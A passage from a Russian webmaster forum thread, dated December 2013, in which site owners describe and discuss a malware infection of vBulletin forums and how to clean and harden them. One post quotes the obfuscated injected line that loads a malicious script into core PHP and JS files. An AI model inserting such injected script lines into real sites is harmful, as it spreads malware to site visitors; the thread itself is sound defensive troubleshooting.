- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Обзор уязвимостей vBulletin 3.8 все уже пофиксено?
Разумеется. Ведь Vbulletin 3.8 НЕ МЕНЯЕТСЯ каждый месяц. Он такой какой есть уже довольно давно. При этом все еще остается сравнительно полным решением для форума.
Вы почитайте там :
Тем временем продолжаю изучение вируса (на примере VBulletin 4.2.X)
Возможно у вас вирус действует иначе, но на моём сайте хронология действий вируса следующая:
1. Хаотично в определённую, имеющую право на запись папку заливается php, который также имеет ничего не значащее имя. Затем, как я предполагаю, данный php используется для загрузки js-файла. js также записывается в случайную папку.
2. Происходит изменение ключевых php и js скриптов сайта, путём добавления в них строки вида:
;document.write("<scr"+"ipt src='/images/cheet.js'><"+"/script>");Опять же на примере "Булки", вставка добавлялась в файлы index.php, content.php, yuiloader-dom-event.js, vbulletin-core.js, vbulletin_cms.js - таким образом внедрённый в главные файлы вредоносный js выполнялся у каждого пользователя, посещавшего сайт.
3. Вирусная программа с определённой периодичностью делала запросы к сайту, проверяя наличие php. И в случае необнаружения файла заливала всё заново, но в другие места и с другими именами. Помимо всего прочего, могла иметь место подмена файлов js, т.е самой же программой файл удалялся и заливался другой. Это могло быть сделано для запутывания пользователя, ну либо были какие-то другие цели.
Ещё имел место swf-файл, заливавшийся вместе с php и js, однако какую роль в этой истории играет swf я пока не додумался.
Короче говоря, надо поставить запрет на запись ключевым php и js-скриптам (а лучше вообще всем сайтовым php и js). Ибо если в файлах сайта нет вирусной вставки, то и вызов левого js будет невозможным.
Но у себя я пока также держу и все папки под запретом на запись.
Пока так.
---------- Добавлено 17.12.2013 в 19:00 ----------
Ах да, для "булочников" совет: в админке запустите диагностику. Она выявит изменённые файлы (особое внимание обратите на файлы с пометкой "не содержит ожидаемого содержимого").
А можно глупый вопрос? Все пароли ftp и sftp поменяны, рутовский пасс на хостинге?
Про пасс на БД не спрашиваю, так как инъекции именно в файло происходят.
Просто одно дело очистить от вредоносного кода, который уже имеется, другое - полностью ограничить доступ злоумышленнику в дальнейшем.
-----
Для форумов действительно тяжело сделать полную переустановку, ибо моды. Но почистить скачанную на комп папку, зная кусок вредоносного кода тоже вполне можно, используя для поиска зараженных файлов notepad++.
Короче говоря, надо поставить запрет на запись ключевым php и js-скриптам (а лучше вообще всем сайтовым php и js). Ибо если в файлах сайта нет вирусной вставки, то и вызов левого js будет невозможным.
Ну значит злоумышленник будет модифицировать шаблоны в базе. Или каких-нибудь неочевидных плагинов напихает.
Просто пока что он пошел простейшим проторенным путем.
Для форумов действительно тяжело сделать полную переустановку, ибо моды
Что моды? Моды тоже обновляются.
Короче говоря, надо поставить запрет на запись ключевым php и js-скриптам (а лучше вообще всем сайтовым php и js). Ибо если в файлах сайта нет вирусной вставки, то и вызов левого js будет невозможным.
Просто нужно удалить закладки, бекдорры, шеллы, называйте как хотите и не морочить себе голову. Пока ПС не дали пинка.
Но почистить скачанную на комп папку, зная кусок вредоносного кода тоже вполне можно, используя для поиска зараженных файлов notepad++.
Да все можно. Можно каждый лень выкачивать десятки гигов файлов форума на комп и перелопачивать. Но смысл ведь в чем. Что бы закрыть вообще лазейку, а не искать варианты, каким образом вычищать, какую версию форума использовать и какие моды на него ставить.
netwind, простите, а Вы тоже из "пострадавших" от этой напасти?
Что бы закрыть вообще лазейку, а не искать варианты, каким образом вычищать, какую версию форума использовать и какие моды на него ставить.
я вам и так точно скажу - ПОСЛЕДНЮЮ ВЕРСИЮ форума и последние версии модов.
Если мод малоизвестный или на официальном сайте доступ временно ограничен - лучше его временно удалить. Для vbulletin так иногда помечают моды даже если информация не подтверждена. Жаль для других CMS с менее развитым коммунити, такого уровня организации не дождешься.
netwind, простите, а Вы тоже из "пострадавших" от этой напасти?
Какой этой? В теме мусолят самые разнообразные случаи заражения и вставки кода. Объединяет всех только самое противное для вебмастера проявление - когда срабатывает антивирус в яндексе тоже. Причины же самые разнообразные. Нет смысла искать систему, ведь практичный метод лечения один и тот же.
Вы можете попытаться включить в логи и содержимое запросов POST, или покопаться в логах изменений mysql или в реальном времени записать трафик за злоумышленником. Найдете уязвимость, найдете о ней что-нибудь в интернете и тут осознаете, что этого всего могло бы не быть, если бы вы просто своевременно обновили версию.
Это в большинстве случаев лишние движения.
И да, я иногда клиентам помогаю удалить закладки.
Если мод мало известный или на официальном сайте доступ временно ограничен - лучше его временно удалить. Для vbulletin так делают. Жаль для других CMS с менее развитым коммунити, такого уровня организации не дождешься.
Вся фишка в том, что аналогичные симптомы наблюдаем не только на булке. Так что, не важно, 3.8 стоит, или 4.2.
Ну пока обсуждаем последний случай. :) Просто вы так активно булку отстаиваете, хотя уже понятно, что здесь дыра не в ЦМС... И сейчас думать надо не как удалить закладки, а откуда они появляются и как это присечь.
А пока, мы знаем только что появляется, в каких местах и как их удалить. Но ничего не знаем о источнике. А через нескольок часов все повторяется. :) У меня уже снова сидят. )) Яша, правда, еще не просек все это, а вот Гоша да...
Ну пока обсуждаем последний случай.
Пока я вижу информацию о том как выглядит закладка, а как закладка оказалась на сайте информации нет. Я думаю, ее и не будет никогда.
Все, что можно таким образом обнаружить - личные предпочтения злоумышленника касательно использования пострадавших сайтов.
Ну обнаружите вы еще двоих-троих пострадавших от того же какера. Как это приблизит вас к цели ?
Никак. Поскольку у вас нет возможности установить способ проникновения, вам предлагают заняться превентивными мерами - тотальное обновление, удаление и отключение всего сомнительного. Это практично.
Недавно уязвимость в php нашли: http://www.securitylab.ru/vulnerability/448492.php
Я не знаю в чем там дело, но раз уж на разных CMS одно и тоже ... (может и совпадение)